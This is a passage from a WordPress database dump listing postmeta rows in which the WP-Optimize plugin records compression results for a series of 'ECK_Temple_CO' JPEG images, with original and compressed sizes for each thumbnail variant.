WP-Optimize'),(164233,165258,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:129763;s:12:\"smushed-size\";i:74516;s:15:\"savings-percent\";d:42.5799999999999982946974341757595539093017578125;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:129763;s:10:\"compressed\";i:74516;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:13559;s:10:\"compressed\";i:12214;}s:6:\"medium\";a:2:{s:8:\"original\";i:33728;s:10:\"compressed\";i:30666;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:50413;s:10:\"compressed\";i:45956;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2464;s:10:\"compressed\";i:2003;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:39549;s:10:\"compressed\";i:36117;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:25128;s:10:\"compressed\";i:22736;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:84375;s:10:\"compressed\";i:77738;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:23547;s:10:\"compressed\";i:21226;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:51963;s:10:\"compressed\";i:47430;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:18891;s:10:\"compressed\";i:16969;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:50338;s:10:\"compressed\";i:45872;}}}'),(164234,165259,'original-file','2019/09/ECK_Temple_CO_042-lg-updraft-pre-smush-original.jpg'),(164235,165259,'smush-complete','1'),(164236,165259,'smush-info','The file was compressed from 108.35 KB to 56.53 KB saving 47.83 percent using WP-Optimize'),(164237,165259,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:110954;s:12:\"smushed-size\";i:57888;s:15:\"savings-percent\";d:47.8299999999999982946974341757595539093017578125;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:110954;s:10:\"compressed\";i:57888;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11883;s:10:\"compressed\";i:10732;}s:6:\"medium\";a:2:{s:8:\"original\";i:27381;s:10:\"compressed\";i:25019;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:39711;s:10:\"compressed\";i:36624;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2349;s:10:\"compressed\";i:1882;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:33831;s:10:\"compressed\";i:30995;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:20860;s:10:\"compressed\";i:18923;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:68033;s:10:\"compressed\";i:63267;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:19468;s:10:\"compressed\";i:17710;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:42160;s:10:\"compressed\";i:38819;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:15347;s:10:\"compressed\";i:13944;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:40496;s:10:\"compressed\";i:37311;}}}'),(164238,165260,'original-file','2019/09/ECK_Temple_CO_043-lg-updraft-pre-smush-original.jpg'),(164239,165260,'smush-complete','1'),(164240,165260,'smush-info','The file was compressed from 87.50 KB to 70.87 KB saving 19.01 percent using WP-Optimize'),(164241,165260,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:89601;s:12:\"smushed-size\";i:72567;s:15:\"savings-percent\";d:19.010000000000001563194018672220408916473388671875;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:89601;s:10:\"compressed\";i:72567;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:14075;s:10:\"compressed\";i:12638;}s:6:\"medium\";a:2:{s:8:\"original\";i:34229;s:10:\"compressed\";i:30915;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:51081;s:10:\"compressed\";i:46038;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2444;s:10:\"compressed\";i:1984;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:41561;s:10:\"compressed\";i:37509;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:25833;s:10:\"compressed\";i:23283;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:86387;s:10:\"compressed\";i:78623;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:23836;s:10:\"compressed\";i:21461;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:53026;s:10:\"compressed\";i:47998;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:18933;s:10:\"compressed\";i:17006;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:50780;s:10:\"compressed\";i:45899;}}}'),(164242,165261,'original-file','2019/09/ECK_Temple_CO_044-lg-updraft-pre-smush-original.jpg'),(164243,165261,'smush-complete','1'),(164244,165261,'smush-info','The file was compressed from 101.27 KB to 68.47 KB saving 32.39 percent using WP-Optimize'),(164245,165261,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:103703;s:12:\"smushed-size\";i:70110;s:15:\"savings-percent\";d:32.3900000000000005684341886080801486968994140625;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:103703;s:10:\"compressed\";i:70110;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:13159;s:10:\"compressed\";i:11734;}s:6:\"medium\";a:2:{s:8:\"original\";i:30886;s:10:\"compressed\";i:27840;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:44520;s:10:\"compressed\";i:40503;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2590;s:10:\"compressed\";i:2083;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:37603;s:10:\"compressed\";i:34015;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:23202;s:10:\"compressed\";i:20796;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:76650;s:10:\"compressed\";i:70372;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:21627;s:10:\"compressed\";i:19379;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:47453;s:10:\"compressed\";i:43127;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:17262;s:10:\"compressed\";i:15423;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:45573;s:10:\"compressed\";i:41285;}}}'),(164246,165262,'original-file','2019/09/ECK_Temple_CO_045-lg-updraft-pre-smush-original.jpg'),(164247,165262,'smush-complete','1'),(164248,165262,'smush-info','The file was compressed from 96.86 KB to 70.81 KB saving 26.9 percent using WP-Optimize'),(164249,165262,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:99188;s:12:\"smushed-size\";i:72509;s:15:\"savings-percent\";d:26.89999999999999857891452847979962825775146484375;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:99188;s:10:\"compressed\";i:72509;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11439;s:10:\"compressed\";i:10404;}s:6:\"medium\";a:2:{s:8:\"original\";i:27341;s:10:\"compressed\";i:24817;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:44524;s:10:\"compressed\";i:40565;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2286;s:10:\"compressed\";i:1829;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:31996;s:10:\"compressed\";i:29526;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:20767;s:10:\"compressed\";i:18786;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:68126;s:10:\"compressed\";i:62785;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:23293;s:10:\"compressed\";i:21116;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:51246;s:10:\"compressed\";i:46941;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:16484;s:10:\"compressed\";i:14898;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:42492;s:10:\"compressed\";i:38935;}}}'),(164250,165263,'original-file','2019/09/ECK_Temple_CO_046-lg-updraft-pre-smush-original.jpg'),(164251,165263,'smush-complete','1'),(164252,165263,'smush-info','The file was compressed from 124.92 KB to 89.32 KB saving 28.5 percent using WP-Optimize'),(164253,165263,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:127917;s:12:\"smushed-size\";i:91462;s:15:\"savings-percent\";d:28.5;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:127917;s:10:\"compressed\";i:91462;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:13731;s:10:\"compressed\";i:12357;}s:6:\"medium\";a:2:{s:8:\"original\";i:31129;s:10:\"compressed\";i:27903;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:52548;s:10:\"compressed\";i:47380;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2365;s:10:\"compressed\";i:1910;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:42805;s:10:\"compressed\";i:38468;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:23157;s:10:\"compressed\";i:20856;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:83187;s:10:\"compressed\";i:75641;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:26525;s:10:\"compressed\";i:23793;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:61065;s:10:\"compressed\";i:55097;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:18633;s:10:\"compressed\";i:16824;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:52434;s:10:\"compressed\";i:47100;}}}'),(164254,165264,'original-file','2019/09/ECK_Temple_CO_047-lg-updraft-pre-smush-original.jpg'),(164255,165264,'smush-complete','1'),(164256,165264,'smush-info','The file was compressed from 102.97 KB to 83.78 KB saving 18.63 percent using WP-Optimize'),(164257,165264,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:105444;s:12:\"smushed-size\";i:85795;s:15:\"savings-percent\";d:18.629999999999999005240169935859739780426025390625;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:105444;s:10:\"compressed\";i:85795;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:15545;s:10:\"compressed\";i:13952;}s:6:\"medium\";a:2:{s:8:\"original\";i:39293;s:10:\"compressed\";i:35202;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:57401;s:10:\"compressed\";i:51278;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2503;s:10:\"compressed\";i:2065;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:46364;s:10:\"compressed\";i:41633;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:29407;s:10:\"compressed\";i:26384;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:98815;s:10:\"compressed\";i:88959;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:27435;s:10:\"compressed\";i:24537;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:61050;s:10:\"compressed\";i:54743;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:21385;s:10:\"compressed\";i:19126;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:57920;s:10:\"compressed\";i:51951;}}}'),(164258,165265,'original-file','2019/09/ECK_Temple_CO_048-lg-updraft-pre-smush-original.jpg'),(164259,165265,'smush-complete','1'),(164260,165265,'smush-info','The file was compressed from 68.67 KB to 53.89 KB saving 21.52 percent using WP-Optimize'),(164261,165265,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:70319;s:12:\"smushed-size\";i:55185;s:15:\"savings-percent\";d:21.519999999999999573674358543939888477325439453125;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:70319;s:10:\"compressed\";i:55185;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11790;s:10:\"compressed\";i:10644;}s:6:\"medium\";a:2:{s:8:\"original\";i:28759;s:10:\"compressed\";i:25992;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:38659;s:10:\"compressed\";i:35439;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2243;s:10:\"compressed\";i:1803;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:33643;s:10:\"compressed\";i:30653;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:21746;s:10:\"compressed\";i:19629;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:69722;s:10:\"compressed\";i:64035;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:20166;s:10:\"compressed\";i:18158;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:43711;s:10:\"compressed\";i:39842;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:15902;s:10:\"compressed\";i:14356;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:41503;s:10:\"compressed\";i:37827;}}}'),(164262,165266,'original-file','2019/09/ECK_Temple_CO_049-lg-updraft-pre-smush-original.jpg'),(164263,165266,'smush-complete','1'),(164264,165266,'smush-info','The file was compressed from 67.49 KB to 46.98 KB saving 30.39 percent using WP-Optimize'),(164265,165266,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:69110;s:12:\"smushed-size\";i:48106;s:15:\"savings-percent\";d:30.3900000000000005684341886080801486968994140625;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:69110;s:10:\"compressed\";i:48106;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8231;s:10:\"compressed\";i:7756;}s:6:\"medium\";a:2:{s:8:\"original\";i:18124;s:10:\"compressed\";i:16902;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:28829;s:10:\"compressed\";i:27146;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1751;s:10:\"compressed\";i:1367;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:24885;s:10:\"compressed\";i:23337;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:13558;s:10:\"compressed\";i:12563;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:48220;s:10:\"compressed\";i:45469;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:15241;s:10:\"compressed\";i:14230;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:35430;s:10:\"compressed\";i:33268;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:10586;s:10:\"compressed\";i:9902;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:29812;s:10:\"compressed\";i:27972;}}}'),(164266,165267,'original-file','2019/09/ECK_Temple_CO_050-lg-updraft-pre-smush-original.jpg'),(164267,165267,'smush-complete','1'),(164268,165267,'smush-info','The file was compressed from 108.18 KB to 61.89 KB saving 42.79 percent using WP-Optimize'),(164269,165267,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:110780;s:12:\"smushed-size\";i:63378;s:15:\"savings-percent\";d:42.78999999999999914734871708787977695465087890625;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:110780;s:10:\"compressed\";i:63378;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11377;s:10:\"compressed\";i:10320;}s:6:\"medium\";a:2:{s:8:\"original\";i:25721;s:10:\"compressed\";i:23447;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:40677;s:10:\"compressed\";i:37263;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2309;s:10:\"compressed\";i:1869;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:31196;s:10:\"compressed\";i:28672;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:19677;s:10:\"compressed\";i:17858;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:62037;s:10:\"compressed\";i:57481;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:22194;s:10:\"compressed\";i:20147;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:47201;s:10:\"compressed\";i:43341;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:15919;s:10:\"compressed\";i:14396;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:39531;s:10:\"compressed\";i:36349;}}}'),(164270,165268,'original-file','2019/09/ECK_Temple_CO_051-lg-updraft-pre-smush-original.jpg'),(164271,165268,'smush-complete','1'),(164272,165268,'smush-info','The file was compressed from 108.72 KB to 57.04 KB saving 47.54 percent using WP-Optimize'),(164273,165268,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:111327;s:12:\"smushed-size\";i:58405;s:15:\"savings-percent\";d:47.53999999999999914734871708787977695465087890625;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:111327;s:10:\"compressed\";i:58405;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12052;s:10:\"compressed\";i:10854;}s:6:\"medium\";a:2:{s:8:\"original\";i:28227;s:10:\"compressed\";i:25727;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:41066;s:10:\"compressed\";i:37791;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2333;s:10:\"compressed\";i:1887;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:34054;s:10:\"compressed\";i:31331;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:21458;s:10:\"compressed\";i:19520;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:69100;s:10:\"compressed\";i:64242;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:19916;s:10:\"compressed\";i:18097;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:43030;s:10:\"compressed\";i:39578;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:16000;s:10:\"compressed\";i:14478;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:41021;s:10:\"compressed\";i:37801;}}}'),(164274,165269,'original-file','2019/09/ECK_Temple_CO_052-lg-updraft-pre-smush-original.jpg'),(164275,165269,'smush-complete','1'),(164276,165269,'smush-info','The file was compressed from 112.07 KB to 60.33 KB saving 46.17 percent using WP-Optimize'),(164277,165269,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:114762;s:12:\"smushed-size\";i:61780;s:15:\"savings-percent\";d:46.1700000000000017053025658242404460906982421875;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:114762;s:10:\"compressed\";i:61780;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12290;s:10:\"compressed\";i:11107;}s:6:\"medium\";a:2:{s:8:\"original\";i:29533;s:10:\"compressed\";i:26954;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:42635;s:10:\"compressed\";i:38990;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2297;s:10:\"compressed\";i:1853;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:34963;s:10:\"compressed\";i:32175;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:22589;s:10:\"compressed\";i:20504;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:72544;s:10:\"compressed\";i:67257;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:20817;s:10:\"compressed\";i:18929;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:45254;s:10:\"compressed\";i:41597;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:16440;s:10:\"compressed\";i:14895;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:42830;s:10:\"compressed\";i:39347;}}}'),(164278,165270,'original-file','2019/09/ECK_Temple_CO_053-lg-updraft-pre-smush-original.jpg'),(164279,165270,'smush-complete','1'),(164280,165270,'smush-info','The file was compressed from 107.01 KB to 60.20 KB saving 43.75 percent using WP-Optimize'),(164281,165270,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:109578;s:12:\"smushed-size\";i:61640;s:15:\"savings-percent\";d:43.75;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:109578;s:10:\"compressed\";i:61640;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10848;s:10:\"compressed\";i:9847;}s:6:\"medium\";a:2:{s:8:\"original\";i:24222;s:10:\"compressed\";i:22190;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:39234;s:10:\"compressed\";i:36124;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2185;s:10:\"compressed\";i:1736;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:31035;s:10:\"compressed\";i:28493;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:18393;s:10:\"compressed\";i:16808;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:62460;s:10:\"compressed\";i:57847;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:20894;s:10:\"compressed\";i:19129;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:46367;s:10:\"compressed\";i:42738;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:14586;s:10:\"compressed\";i:13311;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:39312;s:10:\"compressed\";i:36127;}}}'),(164282,165271,'original-file','2019/09/ECK_Temple_CO_054-lg-updraft-pre-smush-original.jpg'),(164283,165271,'smush-complete','1'),(164284,165271,'smush-info','The file was compressed from 68.46 KB to 45.47 KB saving 33.57 percent using WP-Optimize'),(164285,165271,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:70098;s:12:\"smushed-size\";i:46565;s:15:\"savings-percent\";d:33.57000000000000028421709430404007434844970703125;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:70098;s:10:\"compressed\";i:46565;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10530;s:10:\"compressed\";i:9619;}s:6:\"medium\";a:2:{s:8:\"original\";i:22218;s:10:\"compressed\";i:20548;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:31607;s:10:\"compressed\";i:29464;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2121;s:10:\"compressed\";i:1702;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:29280;s:10:\"compressed\";i:27089;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:16927;s:10:\"compressed\";i:15600;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:55527;s:10:\"compressed\";i:52234;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:15732;s:10:\"compressed\";i:14545;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:33827;s:10:\"compressed\";i:31591;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:12473;s:10:\"compressed\";i:11463;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:32193;s:10:\"compressed\";i:29994;}}}'),(164286,165272,'original-file','2019/09/ECK_Temple_CO_055-lg-updraft-pre-smush-original.jpg'),(164287,165272,'smush-complete','1'),(164288,165272,'smush-info','The file was compressed from 87.40 KB to 39.01 KB saving 55.36 percent using WP-Optimize'),(164289,165272,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:89501;s:12:\"smushed-size\";i:39949;s:15:\"savings-percent\";d:55.3599999999999994315658113919198513031005859375;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:89501;s:10:\"compressed\";i:39949;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8594;s:10:\"compressed\";i:8001;}s:6:\"medium\";a:2:{s:8:\"original\";i:19733;s:10:\"compressed\";i:18486;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:29023;s:10:\"compressed\";i:27373;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1941;s:10:\"compressed\";i:1518;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:25073;s:10:\"compressed\";i:23561;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:14781;s:10:\"compressed\";i:13754;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:50259;s:10:\"compressed\";i:47833;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:13618;s:10:\"compressed\";i:12704;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:30621;s:10:\"compressed\";i:28915;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:10705;s:10:\"compressed\";i:9967;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:29402;s:10:\"compressed\";i:27776;}}}'),(164290,165273,'original-file','2019/09/ECK_Temple_CO_056-lg-updraft-pre-smush-original.jpg'),(164291,165273,'smush-complete','1'),(164292,165273,'smush-info','The file was compressed from 104.22 KB to 54.12 KB saving 48.07 percent using WP-Optimize'),(164293,165273,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:106725;s:12:\"smushed-size\";i:55418;s:15:\"savings-percent\";d:48.07000000000000028421709430404007434844970703125;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:106725;s:10:\"compressed\";i:55418;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10813;s:10:\"compressed\";i:9862;}s:6:\"medium\";a:2:{s:8:\"original\";i:25887;s:10:\"compressed\";i:23760;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:38204;s:10:\"compressed\";i:35311;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2245;s:10:\"compressed\";i:1796;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:30825;s:10:\"compressed\";i:28546;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:19184;s:10:\"compressed\";i:17615;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:64426;s:10:\"compressed\";i:60098;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:17989;s:10:\"compressed\";i:16522;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:39682;s:10:\"compressed\";i:36820;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:14201;s:10:\"compressed\";i:12989;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:38212;s:10:\"compressed\";i:35391;}}}'),(164294,165274,'original-file','2019/09/ECK_Temple_CO_057-lg-updraft-pre-smush-original.jpg'),(164295,165274,'smush-complete','1'),(164296,165274,'smush-info','The file was compressed from 115.57 KB to 61.56 KB saving 46.73 percent using WP-Optimize'),(164297,165274,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:118348;s:12:\"smushed-size\";i:63041;s:15:\"savings-percent\";d:46.72999999999999687361196265555918216705322265625;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:118348;s:10:\"compressed\";i:63041;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:13178;s:10:\"compressed\";i:11663;}s:6:\"medium\";a:2:{s:8:\"original\";i:30949;s:10:\"compressed\";i:27609;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:43217;s:10:\"compressed\";i:38885;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2487;s:10:\"compressed\";i:2022;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:35872;s:10:\"compressed\";i:32203;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:23891;s:10:\"compressed\";i:21171;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:73994;s:10:\"compressed\";i:67070;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:22289;s:10:\"compressed\";i:19716;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:46521;s:10:\"compressed\";i:41661;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:17784;s:10:\"compressed\";i:15727;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:44288;s:10:\"compressed\";i:39699;}}}'),(164298,165275,'original-file','2019/09/ECK_Temple_CO_058-lg-updraft-pre-smush-original.jpg'),(164299,165275,'smush-complete','1'),(164300,165275,'smush-info','The file was compressed from 101.54 KB to 67.72 KB saving 33.31 percent using 